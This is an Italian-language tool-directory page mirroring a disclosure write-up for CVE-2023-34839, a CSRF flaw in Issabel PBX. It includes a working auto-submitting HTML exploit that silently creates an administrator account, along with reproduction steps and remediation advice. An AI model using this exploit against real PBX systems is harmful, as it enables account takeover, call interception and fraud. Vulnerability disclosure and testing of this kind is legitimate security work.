Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-34839 — CVE-2023-34839 è una vulnerabilità di Cross-Site Request Forgery (CSRF) scoperta in Issabel PBX versione 4.0.0-6, una piattaforma di comunicazione unificata open-source ampiamente utilizzata. | Kitploit
Strumenti/GitHubGitHub/sahiloj/cve-2023-34839
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 è una vulnerabilità di Cross-Site Request Forgery (CSRF) scoperta in Issabel PBX versione 4.0.0-6, una piattaforma di comunicazione unificata open-source ampiamente utilizzata.

Vedi Repository
536 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-34839 — Issabel PBX 4.0.0-6: CSRF a Escalation dei Privilegi

CVE Severity CVSS Affected Version


Indice

  • Panoramica
  • Dettagli della Vulnerabilità
  • Software Affetto
  • Punteggio CVSS
  • Scenario di Attacco
  • Proof of Concept (PoC)
  • Passaggi per la Riproduzione
  • Impatto
  • Rimedio
  • Riferimenti
  • Disclaimer

Panoramica

CVE-2023-34839 è una vulnerabilità Cross-Site Request Forgery (CSRF) scoperta in Issabel PBX versione 4.0.0-6, una piattaforma di comunicazione unificata open-source ampiamente utilizzata. La vulnerabilità risiede nell'endpoint di gestione degli utenti e consente a un attaccante remoto non autenticato di creare silenziosamente un nuovo account amministratore, inducendo un amministratore attualmente autenticato a visitare una pagina web appositamente predisposta.


Dettagli della Vulnerabilità

Issabel PBX 4.0.0-6 non implementa protezioni CSRF (ad esempio, token sincronizzatore, attributi del cookie SameSite o validazione delle intestazioni Origin / Referer) sull'endpoint di creazione utente:

root@kitploit:~
POST /index.php?menu=userlist&action=new

Poiché l'applicazione si basa esclusivamente sui cookie di sessione per l'autenticazione e non esegue alcuna validazione delle richieste che modificano lo stato, una richiesta POST contraffatta proveniente da qualsiasi origine verrà accettata ed elaborata con tutti i privilegi della sessione dell'amministratore autenticato.

Causa principale: Assenza di validazione del token anti-CSRF sugli endpoint amministrativi che modificano lo stato.

Classe di vulnerabilità: CWE-352 — Cross-Site Request Forgery (CSRF)


Software Affetto

SoftwareVersioneStato
Issabel PBX4.0.0-6Vulnerabile ✔
  • Homepage del fornitore: https://www.issabel.org/
  • Codice sorgente: https://github.com/IssabelFoundation/issabelPBX

Punteggio CVSS


Scenario di Attacco

Un attaccante può sfruttare questa vulnerabilità seguendo questi passaggi ad alto livello:

  1. Creare una pagina HTML malevola contenente un modulo nascosto che punta all'endpoint di creazione utente di Issabel PBX con valori controllati dall'attaccante (nome utente, password, gruppo = amministratore).
  2. Ospitare la pagina malevola su un server o inviarla all'amministratore target tramite email di phishing, messaggio chat o qualsiasi vettore di ingegneria sociale.
  3. Attendere che l'amministratore apra il link mentre ha una sessione attiva e autenticata con l'applicazione Issabel PBX.
  4. Il browser invia automaticamente il modulo utilizzando il cookie di sessione esistente della vittima, causando la creazione silenziosa di un nuovo account amministratore da parte dell'applicazione.
  5. L'attaccante effettua il login con le credenziali appena create e ottiene accesso completo come amministratore al sistema PBX, inclusi routing delle chiamate, registrazioni, configurazione dei trunk SIP e tutte le impostazioni di sistema.

Non è richiesta altra interazione oltre a una singola visita alla pagina da parte della vittima.


Proof of Concept (PoC)

⚠️ Solo per scopi educativi e test autorizzati.
Sostituire localhost con il nome host o l'indirizzo IP dell'istanza Issabel PBX target.
Se si effettuano test contro un endpoint https:// con un certificato autofirmato, è necessario prima visitare l'URL target nello stesso browser e accettare l'avviso del certificato; altrimenti il browser bloccherà l'invio del modulo cross-origin.

root@kitploit:~
<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Il file exploit è disponibile anche in questo repository: CSRF Exploit.html


Passaggi per la Riproduzione

Prerequisiti

  • Un'istanza funzionante di Issabel PBX 4.0.0-6.
  • Un account amministratore con una sessione attiva nel browser.
  • Un browser sulla stessa macchina della sessione dell'amministratore.

Passaggio 1 — Effettuare il login a Issabel PBX come Amministratore

Navigare all'interfaccia web di Issabel PBX e accedere con le credenziali di amministratore.

Issabel PBX Login


Passaggio 2 — Preparare l'Exploit CSRF

Copiare il codice HTML del PoC sopra e salvarlo come file .html, sostituendo localhost con il nome host o l'indirizzo IP effettivo dell'istanza Issabel target.

L'exploit utilizza campi del modulo nascosti per inviare silenziosamente una richiesta POST di creazione di un nuovo utente all'applicazione. Quando la pagina viene caricata, il JavaScript incorporato invia immediatamente il modulo senza alcuna azione visibile da parte dell'utente.

CSRF Exploit HTML


Passaggio 3 — Aprire l'Exploit nello Stesso Browser

Aprire il file HTML salvato nello stesso browser (in una nuova scheda) mentre la sessione dell'amministratore è ancora attiva. Il modulo verrà inviato automaticamente immediatamente dopo il caricamento della pagina.


Passaggio 4 — Verificare la Creazione del Nuovo Account Amministratore

Tornare al pannello Gestione utenti di Issabel PBX. Un nuovo account utente (in questo PoC, chiamato CSRF) sarà stato creato con pieni privilegi di Amministratore — senza alcuna interazione aggiuntiva oltre all'apertura della pagina exploit.

New Admin User Created


Impatto

Lo sfruttamento riuscito di CVE-2023-34839 consente a un attaccante di:

  • Creare account amministratore non autorizzati sul sistema PBX, fornendo accesso persistente con tutti i privilegi.
  • Modificare il routing delle chiamate e i trunk SIP, consentendo intercettazioni o frodi telefoniche.
  • Accedere alle registrazioni vocali e ai registri dettagliati delle chiamate (CDR), causando la divulgazione di informazioni sensibili.
  • Bloccare gli amministratori legittimi modificando le password o eliminando account esistenti.
  • Interrompere le comunicazioni alterando o eliminando la configurazione del PBX.

Poiché l'account non autorizzato persiste anche dopo la fine della sessione della vittima, l'attaccante mantiene l'accesso a tempo indeterminato fino a quando l'account non viene scoperto e rimosso.


Rimedio

Gli amministratori e gli sviluppatori di Issabel PBX dovrebbero applicare le seguenti mitigazioni:

  1. Implementare token Anti-CSRF: Generare un token unico, imprevedibile e legato alla sessione per ogni modulo che modifica lo stato. Validare il token lato server prima di elaborare qualsiasi richiesta POST.

  2. Applicare SameSite=Strict o SameSite=Lax sui cookie di sessione: Questo istruisce i browser a non inviare cookie su richieste cross-site, prevenendo efficacemente gli attacchi CSRF classici nei browser moderni.

  3. Validare le intestazioni Origin e Referer: Rifiutare le richieste la cui intestazione Origin o Referer non corrisponde al dominio previsto dell'applicazione.

  4. Richiedere la ri-autenticazione per azioni sensibili: Richiedere all'amministratore di inserire la password corrente prima di consentire la creazione di nuovi account a livello di amministratore.

  5. Applicare le ultime patch di sicurezza: Monitorare la pagina delle release di Issabel e il repository ufficiale per patch che risolvono questa CVE.


Riferimenti

  • NVD — CVE-2023-34839
  • OWASP — Cross-Site Request Forgery (CSRF)
  • CWE-352: Cross-Site Request Forgery
  • Sito ufficiale di Issabel
  • IssabelFoundation/issabelPBX su GitHub

Disclaimer

Questo repository è destinato esclusivamente a scopi educativi e a ricerche di sicurezza autorizzate. Le informazioni e il codice proof-of-concept forniti qui devono essere utilizzati solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per testare. L'uso non autorizzato di questo exploit contro sistemi che non possiedi è illegale e può portare a procedimenti penali. L'autore declina ogni responsabilità per qualsiasi uso improprio delle informazioni contenute in questo repository.

Scarica lo strumento
CampoValore
ID CVECVE-2023-34839
Data23 Giugno 2023
RicercatoreSahil Ojha
FornitoreIssabel
ProdottoIssabel PBX
Versione4.0.0-6
Testato suWindows
MetricaValore
Vettore CVSS v3.1AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Punteggio Base8.8 (Alto)
Vettore d'attaccoRete
Complessità dell'attaccoBassa
Privilegi richiestiNessuno
Interazione utenteRichiesta (visita amministratore)
AmbitoInvariato
RiservatezzaAlta
IntegritàAlta
DisponibilitàAlta